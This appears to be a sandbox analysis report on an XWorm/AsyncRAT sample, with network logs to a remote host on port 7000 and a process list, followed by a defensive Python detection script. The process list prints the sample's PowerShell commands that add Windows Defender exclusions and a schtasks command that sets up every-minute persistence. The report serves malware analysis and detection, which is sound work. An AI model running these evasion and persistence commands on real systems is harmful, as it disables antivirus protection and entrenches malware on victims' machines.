Nov 29, 2024 15:20:16.648343086 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:16.648417950 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:16.768445015 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:16.768563986 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:16.888705969 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:16.888809919 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:17.009052038 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.009313107 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:17.129343033 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.132028103 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:17.252152920 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.252229929 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:17.372273922 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.376091957 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:17.496104002 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.496165037 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:17.524610996 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.573647976 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:17.613174915 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:17.660739899 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.660928011 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:17.733374119 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.733532906 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.733648062 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.733798981 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.733886003 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.733896017 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.780916929 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.781033039 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:17.901042938 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:17.901099920 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.021142006 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.021425009 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.141469955 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.141578913 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.261837959 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.262075901 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.296545029 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.339380026 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.346810102 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.424562931 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.424695015 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.467293978 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.467335939 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.545063019 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.545159101 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.665245056 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.665338993 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.786140919 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.786269903 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.906361103 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.906505108 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:18.966221094 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:18.966387987 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:19.003371954 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:19.026587963 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.086668015 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.086730003 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:19.123574018 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.123707056 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.123763084 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.123836040 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.123886108 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.206629992 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.206696987 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:19.326960087 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.327414989 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:19.447408915 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.447501898 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:19.567522049 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.567735910 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:19.619529963 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.664881945 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:19.687679052 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.784989119 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.785031080 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.785058975 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:19.785238981 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.785311937 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.785384893 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.905067921 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:19.905185938 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:20.025113106 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.025248051 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:20.145220995 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.145348072 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:20.265360117 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.265460968 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:20.381582975 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.381652117 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:20.385449886 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.436074972 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:20.501656055 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.501704931 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:20.556361914 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.556430101 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.556549072 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.556647062 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.556713104 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.622150898 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.622209072 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:20.696552038 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.696654081 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:20.702475071 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:20.742177963 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.816684008 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.823219061 CET  7000         49829      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:20.823525906 CET  49829        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:21.937542915 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:22.057476044 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:22.535914898 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:22.539252043 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:22.659337044 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:28.820631027 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:28.870570898 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:35.886538982 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:36.006378889 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:36.482296944 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:36.485506058 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:36.605488062 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:43.914413929 CET  80           49699      208.95.112.1     192.168.2.7
Nov 29, 2024 15:20:43.914515972 CET  49699        80         192.168.2.7      208.95.112.1
Nov 29, 2024 15:20:48.841197968 CET  49699        80         192.168.2.7      208.95.112.1
Nov 29, 2024 15:20:48.961262941 CET  80           49699      208.95.112.1     192.168.2.7
Nov 29, 2024 15:20:49.855393887 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:49.975497007 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:50.495111942 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:50.497402906 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:20:50.617286921 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:58.830595016 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:20:58.870718956 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:21:03.808777094 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:21:03.929220915 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:21:04.426498890 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:21:04.428611040 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:21:04.548547983 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:21:18.808650970 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:21:18.928783894 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:21:19.403960943 CET  7000         49806      103.230.121.124  192.168.2.7
Nov 29, 2024 15:21:19.404979944 CET  49806        7000       192.168.2.7      103.230.121.124
Nov 29, 2024 15:21:19.525010109 CET  7000         49806      103.230.121.124  192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 29, 2024 15:19:07.375252962 CET  52260        53         192.168.2.7      1.1.1.1
Nov 29, 2024 15:19:07.514259100 CET  53           52260      1.1.1.1          192.168.2.7
Timestamp                            Source IP    Dest IP      Trans ID  OP Code             Name        Type            Class        DNS over HTTPS
Nov 29, 2024 15:19:07.375252962 CET  192.168.2.7  1.1.1.1      0x3c66    Standard query (0)  ip-api.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP    Dest IP      Trans ID  Reply Code    Name        CName  Address       Type            Class        DNS over HTTPS
Nov 29, 2024 15:19:07.514259100 CET  1.1.1.1      192.168.2.7  0x3c66    No error (0)  ip-api.com         208.95.112.1  A (IP address)  IN (0x0001)  false
                                                                • ip-api.com
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.7  49699        208.95.112.1    80                5668  C:\Users\user\Desktop\file.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 29, 2024 15:19:07.642568111 CET  80                 OUT        GET /line/?fields=hosting HTTP/1.1
                                                                   Host: ip-api.com
                                                                   Connection: Keep-Alive
Nov 29, 2024 15:19:08.820662022 CET  175                IN         HTTP/1.1 200 OK
                                                                   Date: Fri, 29 Nov 2024 14:19:08 GMT
                                                                   Content-Type: text/plain; charset=utf-8
                                                                   Content-Length: 6
                                                                   Access-Control-Allow-Origin: *
                                                                   X-Ttl: 60
                                                                   X-Rl: 44
                                                                   Data Raw: 66 61 6c 73 65 0a
                                                                   Data Ascii: false



                                                                Target ID:0
                                                                Start time:09:19:05
                                                                Start date:29/11/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0x260000
                                                                File size:445'952 bytes
                                                                MD5 hash:9FF920C7C3199DBFFF9B507272C9F65A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:7
                                                                Start time:09:19:07
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:09:19:07
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:09:19:14
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:09:19:14
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:09:19:26
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:09:19:26
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:11:14:07
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Word.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:11:14:07
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:11:14:30
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe"
                                                                Imagebase:0x7ff60c330000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:19
                                                                Start time:11:14:30
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:11:14:30
                                                                Start date:29/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\Word.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\Word.exe
                                                                Imagebase:0xcb0000
                                                                File size:445'952 bytes
                                                                MD5 hash:9FF920C7C3199DBFFF9B507272C9F65A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: ditekSHen
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 76%, ReversingLabs
                                                                Has exited:true

                                                                Target ID:23
                                                                Start time:11:14:43
                                                                Start date:29/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\Word.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\AppData\Roaming\Word.exe"
                                                                Imagebase:0x60000
                                                                File size:445'952 bytes
                                                                MD5 hash:9FF920C7C3199DBFFF9B507272C9F65A
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:24
                                                                Start time:11:14:51
                                                                Start date:29/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\Word.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\AppData\Roaming\Word.exe"
                                                                Imagebase:0x990000
                                                                File size:445'952 bytes
                                                                MD5 hash:9FF920C7C3199DBFFF9B507272C9F65A
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:25
                                                                Start time:11:15:01
                                                                Start date:29/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\Word.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\Word.exe
                                                                Imagebase:0xea0000
                                                                File size:445'952 bytes
                                                                MD5 hash:9FF920C7C3199DBFFF9B507272C9F65A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true
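The command lines of Targets 7, 11, 14, 16 and 18 document the sample's host-side defence evasion and persistence as one chain: four Add-MpPreference calls, each launched with -ExecutionPolicy Bypass, exclude first the original file.exe and then the dropped copy Word.exe from Windows Defender by path and by process name, and schtasks then registers a task that relaunches the excluded Word.exe from the user's AppData\Roaming directory every minute at the highest run level. The Python below is an added example, not Joe Sandbox output and not code from the sample: it parses process-creation command lines modelled on those entries (constructed records; the pid values reuse the report's Target IDs) and correlates the Defender exclusion with the task that launches the excluded binary, which is the combination a detection rule should alert on rather than either command alone.

```python
"""Detection logic for the Defender-exclusion plus scheduled-task chain above.

Added example, not Joe Sandbox output and not code from the sample. It tokenizes
Windows process command lines, flags Add-MpPreference exclusions and
'schtasks /create' persistence, and correlates the two. SAMPLE_EVENTS are
constructed from the command lines in the process list; the pid values reuse
the report's Target IDs for readability.
"""
import re

# Command-line tokenizer: "double-quoted", 'single-quoted' (PowerShell) or bare tokens.
_TOKEN = re.compile(r'"([^"]*)"' + r"|'([^']*)'" + r"|(\S+)")
# Directories a standard user can write to: an excluded, task-launched binary here
# is the RAT persistence pattern, not an administrator excluding a build tree.
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Users\\[^\\]+\\Desktop)\\", re.I)

PS = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
SCH = r'"C:\Windows\System32\schtasks.exe"'
SAMPLE_EVENTS = [  # constructed from Targets 7, 11, 14, 16, 18 and 20 above
    {"pid": 7, "cmdline": PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'"},
    {"pid": 11, "cmdline": PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'"},
    {"pid": 14, "cmdline": PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe'"},
    {"pid": 16, "cmdline": PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Word.exe'"},
    {"pid": 18, "cmdline": SCH + r' /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe"'},
    {"pid": 20, "cmdline": r"C:\Users\user\AppData\Roaming\Word.exe"},
]


def tokenize(cmdline):
    """Split a command line into arguments, stripping one layer of quotes."""
    return [a or b or c for a, b, c in _TOKEN.findall(cmdline)]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse_powershell(toks):
    """Return (bypass, [(kind, value)]) for Add-MpPreference exclusion arguments."""
    low = [t.lower() for t in toks]
    # powershell.exe accepts unambiguous prefixes of -ExecutionPolicy (-ep, -ex, -exec)
    bypass = any(low[i] in ("-executionpolicy", "-ep", "-ex", "-exec")
                 and i + 1 < len(low) and low[i + 1] in ("bypass", "unrestricted")
                 for i in range(len(low)))
    exclusions = []
    if "add-mppreference" in low:
        for i, t in enumerate(low):
            if t in ("-exclusionpath", "-exclusionprocess", "-exclusionextension") and i + 1 < len(toks):
                exclusions.append((t[len("-exclusion"):], toks[i + 1]))
    return bypass, exclusions


def parse_schtasks(toks):
    """Return {'/flag': value} for a 'schtasks /create' command line, else None."""
    low = [t.lower() for t in toks]
    if "/create" not in low:
        return None
    return {t: toks[i + 1] for i, t in enumerate(low)
            if t.startswith("/") and i + 1 < len(toks) and not toks[i + 1].startswith("/")}


def analyse(events):
    """Score process-creation events and correlate exclusions with scheduled tasks."""
    report = {"exclusions": [], "tasks": {}, "findings": [], "chains": []}
    for ev in events:
        toks = tokenize(ev["cmdline"])
        if not toks:
            continue
        image = image_name(toks[0])
        if image == "powershell.exe":
            bypass, exclusions = parse_powershell(toks)
            for kind, value in exclusions:
                report["exclusions"].append((kind, value))
                sev = "high" if kind == "path" and USER_WRITABLE.search(value) else "medium"
                note = " (with -ExecutionPolicy Bypass)" if bypass else ""
                report["findings"].append((ev["pid"], sev, f"Defender {kind} exclusion added: {value}{note}"))
        elif image == "schtasks.exe":
            opts = parse_schtasks(toks)
            if opts and "/tr" in opts:
                name = opts.get("/tn", "?")
                report["tasks"][name] = opts
                reasons = []
                if opts.get("/sc", "").lower() == "minute" and opts.get("/mo", "1") == "1":
                    reasons.append("re-runs every minute (watchdog-style persistence)")
                if opts.get("/rl", "").upper() == "HIGHEST":
                    reasons.append("runs with highest privileges")
                if USER_WRITABLE.search(opts["/tr"]):
                    reasons.append("action lives in a user-writable directory")
                if reasons:
                    sev = "high" if len(reasons) > 1 else "medium"
                    report["findings"].append((ev["pid"], sev, f"task '{name}' -> {opts['/tr']}: " + "; ".join(reasons)))
        elif USER_WRITABLE.search(toks[0]):
            report["findings"].append((ev["pid"], "low", f"process started from user-writable path: {toks[0]}"))
    # Correlation: a task whose action is a Defender-excluded path or process name.
    excluded_paths = {v.lower() for k, v in report["exclusions"] if k == "path"}
    excluded_procs = {v.lower() for k, v in report["exclusions"] if k == "process"}
    for name, opts in report["tasks"].items():
        action = opts["/tr"]
        if action.lower() in excluded_paths or image_name(action) in excluded_procs:
            report["chains"].append((name, action))
            report["findings"].append((None, "critical", f"task '{name}' launches a Defender-excluded binary: {action}"))
    return report


if __name__ == "__main__":
    for pid, sev, msg in analyse(SAMPLE_EVENTS)["findings"]:
        print(f"[{sev:8}] target {pid}: {msg}")
```

Run stand-alone it prints one line per finding. In a SIEM pipeline the same analyse() would be fed Sysmon event 1 or Security 4688 command lines per host; the correlation step at the end is what separates this chain from an administrator legitimately excluding a build directory, and the critical finding is the one worth paging on.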


                                                                  Execution Graph

                                                                  Execution Coverage:24.6%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:33.3%
                                                                  Total number of Nodes:9
                                                                  Total number of Limit Nodes:0

                                                                  Control-flow Graph

• Rendered graph omitted (the executed/not-executed node colouring is not recoverable from text); the function starts at 7ffaac489b09 and its basic blocks span 7ffaac489b09-7ffaac48afcf
